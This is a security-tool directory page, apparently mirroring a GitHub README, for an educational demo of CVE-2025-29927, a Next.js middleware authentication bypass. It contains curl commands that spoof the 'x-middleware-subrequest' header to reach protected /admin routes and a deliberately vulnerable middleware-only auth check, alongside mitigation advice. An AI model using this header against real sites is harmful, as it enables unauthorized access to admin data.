Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2025-29927-nextjs — Demo educativa di CVE-2025-29927, un bypass critico dell'autenticazione middleware di Next.js. Include un pannello di amministrazione vulnerabile, comandi di exploit proof-of-concept e indicazioni per la mitigazione per la formazione sulla sicurezza. | Kitploit
Strumenti/GitHubGitHub/gitgudkrish/cve-2025-29927-nextjs
Analisi delle VulnerabilitàSfruttamento di Applicazioni WebSicurezza WebPenetration TestingAutenticazioneApprendimento e Formazione
GitHubgitgudkrish/cve-2025-29927-nextjs

cve-2025-29927-nextjs

Demo educativa di CVE-2025-29927, un bypass critico dell'autenticazione middleware di Next.js. Include un pannello di amministrazione vulnerabile, comandi di exploit proof-of-concept e indicazioni per la mitigazione per la formazione sulla sicurezza.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
3 mesi faNon ancora revisionato

Himalaya Tech Admin Panel — CVE-2025-29927 Demo

ATTENZIONE: Questa applicazione è intenzionalmente vulnerabile. Solo per scopi didattici e di ricerca sulla sicurezza autorizzata. NON distribuire su un server pubblico.


Informazioni su questa Demo

Questa app dimostra CVE-2025-29927, una vulnerabilità critica di bypass dell'autenticazione nel middleware di Next.js (CVSS 9.1). L'applicazione simula un realistico pannello di amministrazione aziendale per l'azienda fittizia "Himalaya Tech Pvt. Ltd." — rendendo l'impatto del bypass visivamente convincente.

Tutti i record dei dipendenti, le chiavi API, le credenziali del database e altri dati "sensibili" mostrati sono completamente fittizi e simulati — generati solo per dimostrazione didattica.


CVE-2025-29927 — Riepilogo della vulnerabilità

CampoDettaglio
CVE IDCVE-2025-29927
GravitàCritica (CVSS 9.1)
InteressatoNext.js ≤ 14.2.29, Next.js ≤ 15.2.2
Corretto inNext.js 14.2.30, 15.2.3
TipoBypass dell'autenticazione del middleware tramite manipolazione dell'intestazione HTTP

Causa principale

Next.js utilizza un'intestazione HTTP interna x-middleware-subrequest per tracciare le chiamate ricorsive del middleware e prevenire cicli infiniti. Nelle versioni vulnerabili, un utente malintenzionato può falsificare questa intestazione in una richiesta esterna. Quando l'intestazione è presente e corrisponde all'identificatore del middleware, il runtime di Next.js salta completamente il middleware, inclusa tutta la logica di autenticazione in esso definita.

Impatto

Qualsiasi applicazione che si basa esclusivamente su middleware.ts per proteggere le route (un pattern comune e raccomandato di Next.js) è vulnerabile. Un utente malintenzionato non autenticato può accedere a qualsiasi pagina protetta semplicemente aggiungendo un'intestazione HTTP.


Prova di concetto

Richiesta normale (bloccata — reindirizza a /login)

root@kitploit:~
curl -v http://localhost:3000/admin
# → 307 Redirect to /login

Richiesta di bypass (riuscita — restituisce l'intera pagina di amministrazione)

root@kitploit:~
curl -v \
  -H "x-middleware-subrequest: middleware" \
  http://localhost:3000/admin

# → 200 OK — full admin dashboard HTML returned, no authentication required

Accesso a route protette nidificate

root@kitploit:~
# Admin users page
curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin/users

# System settings with "production credentials"
curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin/settings

Utilizzo di un browser (tramite Burp Suite / estensione del browser)

Aggiungi l'intestazione della richiesta x-middleware-subrequest: middleware a qualsiasi richiesta a /admin/* e il controllo del middleware verrà saltato.


Perché questa app è vulnerabile

middleware.ts è l'unico meccanismo di protezione:

root@kitploit:~
// middleware.ts
export function middleware(request: NextRequest) {
  if (pathname.startsWith("/admin")) {
    const token = request.cookies.get("auth-token")?.value;
    if (!token || token !== "valid-session-xyz123") {
      return NextResponse.redirect(loginUrl); // ← this entire function is skipped
    }
  }
  return NextResponse.next();
}

I componenti della pagina stessi (ad es. app/admin/page.tsx) non contengono nessun controllo di autenticazione — intenzionalmente, per rispecchiare applicazioni reali che seguono il pattern di protezione basato solo sul middleware.


Installazione ed esecuzione

Prerequisiti

  • Node.js 18+
  • npm o yarn

Installazione

root@kitploit:~
npm install

Avvia il server di sviluppo

root@kitploit:~
npm run dev

L'app sarà disponibile all'indirizzo http://localhost:3000.

Route

*Protetto solo dal middleware — bypassato da CVE-2025-29927.

Credenziali della demo (flusso di login normale)

  • Email: [email protected]
  • Password: Admin@2024

Mitigazione

  1. Aggiorna Next.js alla versione 14.2.30+ o 15.2.3+.
  2. Difesa in profondità: aggiungi controlli di autenticazione lato server all'interno dei componenti delle pagine/gestori di route, non solo nel middleware. Il middleware dovrebbe essere trattato come un'ottimizzazione UX, non come un confine di sicurezza.
  3. Rimuovi l'intestazione al tuo reverse proxy/CDN prima che le richieste raggiungano Next.js.

Dichiarazione di non responsabilità

Questa applicazione è fornita solo per scopi didattici, in particolare per dimostrare l'impatto reale di CVE-2025-29927 in un contesto di corso di sicurezza etica. Tutti i dati (record dei dipendenti, chiavi API, credenziali) sono completamente fittizi. Non utilizzare questa applicazione demo o le tecniche dimostrate qui contro sistemi di cui non si possiede o non si ha l'esplicita autorizzazione a testare.

Scarica lo strumento
RouteAutenticazione richiestaDescrizione
/NoPagina di destinazione pubblica
/loginNoModulo di login
/adminSì*Pannello di amministrazione con dati sensibili
/admin/usersSì*Gestione utenti
/admin/settingsSì*Impostazioni di sistema e credenziali